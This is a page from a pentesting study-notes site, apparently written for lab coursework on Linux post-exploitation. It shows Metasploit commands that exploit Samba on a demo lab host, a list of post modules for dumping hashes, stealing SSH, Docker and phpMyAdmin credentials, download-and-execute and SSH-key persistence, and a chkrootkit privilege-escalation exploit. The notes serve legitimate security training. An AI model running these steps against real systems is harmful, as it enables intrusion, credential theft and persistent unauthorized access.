Dark Arts
  • index
  • BUY ME A BOOK
  • 🪄Dark Magic
    • Pentesting
      • Industry Methodologies
    • Scopes of Testing
    • Reconnaissance
      • Passive
        • WHOIS
        • DNS
          • nslookup
          • dig
        • WAF
        • Subdomain
        • Google Dork
        • Misc. Techniques
        • Leaked Passwords
      • Active
        • Browser & Plugins
        • ping & traceroute
        • fping
        • telnet & netcat
        • DNS
          • Zone Transfer
          • DNS Amplification DDoS Attack Breakdown
        • Misc. Techniques
    • Vulnerability Assessment
    • Attack Types
  • 🕷️Aragoogs Nest
    • Web Application Overview & Security
      • Security Testing
      • Common Threats & Risks
    • Web Application Architecture
      • Technologies
    • HTTP/S
      • Message
      • Request
      • Response
        • Status Code
    • Crawling/Spidering
  • 🧪Potions
    • Web Browsers
    • Computer Networking
      • Network Protocol
      • Packets
      • OSI Layer
        • Layer 3: Network
        • Layer 4: Transport
      • DNS
        • Primary-Secondary
        • Local Name Resolution
        • Domain Hierarchy
        • FQDN
        • Lookups
        • DNS Resolution
        • DNS Records
        • Security: Attack-Defense (Default)
  • 🎆Spells
    • 📜Linux Scroll
    • 📜WebShell Scroll
    • git
      • Attacks + Vulnerabilities
  • 🖼️Flaws w/ Magical Frameworks
    • Windows
      • In a Nutshell
      • CVE-2019-0708: BlueKeep
      • CVE-2017-0144: EternalBlue: MS17-010
      • Attacking Services
        • MS IIS - WebDAV
        • SMB
        • HTTP File Server (HFS)
        • Apache Tomcat Web Server
        • RDP
        • WinRM
      • File System Vulnerabilities
      • Credential Dumping
        • Password Search in Windows Configuration Files
        • Mimikatz
        • Pass-the-Hash Attack
    • Linux
      • In a Nutshell
      • CVE-2014-6271: Shellshock
      • Attacking Services
        • FTP
        • SSH
        • SAMBA
        • SMTP
        • RSYNC
      • Dumping Hashes
  • 🌼Marauder's Boost
    • Privilege Escalation
    • Windows PrivEsc
      • Windows Kernel Exploit
      • Bypassing UAC
      • Access Token Impersonation
    • Linux PrivEsc
      • Linux Kernel Exploit
      • Misconfigured Cron Jobs
      • Exploiting SUID Binaries
      • shells
      • File Permissions
  • ☠️Death Eaters
    • Post Exploitation
      • Windows
      • Linux
  • 🪄OLLIVANDERS
    • nmap
      • Host Discovery
      • Port Scan
      • Service & OS
      • NSE
      • Firewall/IDS Evasion
      • Scan Optimization
      • Misc. Methods
    • ffuf
    • Hydra
    • Metasploit Framework
      • Architecture
      • Must to Know
      • msfvenom
      • Auxiliary Modules
      • Service Enumeration
      • Vulnerability Scanning
      • Imports
      • Automating
    • Vulnerability Scanners
    • Wireshark
  • 🚂Platform 9(3/4)
    • Auth-Auth
      • Authentication
        • Password-based Authentication
        • Basic Authentication
        • Multi-factor Authentication
        • Access Token
        • Token-based Authentication
          • JWT
          • OAuth 2.0
    • Secure Headers
      • Content-Security-Policy (CSP)
    • Cryptography
      • Caesar Cipher
  • ⛲Port Pensieve
    • Enumeration
      • SMB & NetBIOS
      • SNMP
    • Wordlists
  • 🔆DUELS
    • Pivoting
    • SMB Relay Attack
  • 🗺️Marauder's Map
    • Web Application Pentesting
    • API Pentesting
      • GraphQL
        • Primer
    • Mobile Application Pentesting
  • 🎧SIDE CHANNEL
    • Side Channel Analysis
    • Timing Side-Channel Attacks
      • Vulnerable Login
  • 🥃Sky
    • Cloud Basics
    • Cloud Management
      • Shared Responsibility Model
    • Using Cloud Resources
      • Monitoring & Alerts
      • Identity & Access Management
      • Scalability & Availability
      • Solution Design
    • Cloud Providers
    • Cloud Security & Regulatory Compliance
      • Resource Protection
      • ICCA: Cloud Security & Regulatory Compliance
    • ICCA Preparation
      • Knowledge Tests
      • Lab
  • 🔷Obsidian
    • Pentest Engagement
      • Scoping
    • Pentest Ethics
      • Rules of Engagement
    • Auditing Fundamentals
      • Process/Lifecycle
      • Pentest & Security Auditing
      • GRC
      • Standards, Frameworks & Guidelines
      • From Audit to Pentest
  • 💢Threat Modeling
    • Why Threat Model?
  • 📡THREAT INTEL
    • Threat Intelligence
    • Tool Dump
  • 📱Anything-Mobile-IoT
    • Firmware
    • Firmware Analysis
      • Example: CVE-2016-1555
    • Firmware Installation/Flashing
  • 🎉Mischeif
    • Social Engineering
    • Phishing
      • GoPhish
    • Pretexting
Powered by GitBook
On this page
  • Common Metasploit Modules
  • Rootkit Scanner
  1. Death Eaters
  2. Post Exploitation

Linux

Common Metasploit Modules

msfconsole
use exploit/linux/samba/is_known_pipename
set RHOST demo.ine.local
check
exploit -z

post/linux/gather/enum_configs
# Enumerates configuration files on a Linux target.

post/multi/gather/env
# Gathers environment variables from the target system across multiple platforms.

post/linux/gather/enum_network
# Enumerates network-related information such as interfaces and IP addresses on a Linux system.

post/linux/gather/enum_protections
# Gathers information on security protections (e.g., AppArmor, SELinux) on a Linux target.

post/linux/gather/enum_system
# Enumerates system-level information such as OS details and kernel version on a Linux target.

post/linux/gather/checkcontainer
# Checks if the Linux target is running inside a container.

post/linux/gather/checkvm
# Detects if the Linux target is running inside a virtual machine.

post/linux/gather/enum_users_history
# Enumerates the user history (e.g., bash history) on a Linux target to find potential clues.

post/multi/manage/system_session
# Manages and interacts with system-level sessions across multiple platforms.

post/linux/manage/download_exec
# Downloads and executes a payload on a Linux target system.

post/multi/gather/ssh_creds
# Gathers SSH credentials (username/password or private keys) from the target system across multiple platforms.

post/multi/gather/docker_creds
# Gathers Docker credentials, including tokens or keys, from the target system.

post/linux/gather/hashdump
# Dumps password hashes from the Linux target system, useful for offline cracking.

post/linux/gather/ecryptfs_creds
# Gathers credentials stored in encrypted form using eCryptfs on a Linux target.

post/linux/gather/enum_psk
# Enumerates pre-shared keys (PSKs) used in VPNs or wireless networks on a Linux system.

post/linux/gather/enum_xchat
# Retrieves credentials stored by the XChat IRC client on the target Linux system.

post/linux/gather/phpmyadmin_credsteal
# Steals stored credentials from PHPMyAdmin configuration on a Linux target.

post/linux/gather/pptpd_chap_secrets
# Extracts CHAP secrets (used for VPN authentication) from the pptpd configuration on a Linux system.

post/linux/manage/sshkey_persistence
# Creates persistent SSH key for maintaining access to the compromised Linux system.

Rootkit Scanner

ps aux
cat /bin/check-down

command -v chkrootkit
/bin/chkrootkit -V

searchsploit chkrootkit 0.49

use exploit/unix/local/chkrootkit
set CHKROOTKIT /bin/chkrootkit
set session 1
set LHOST [IP]
exploit
cat /root/flag
PreviousWindowsNextnmap

Last updated 3 months ago

☠️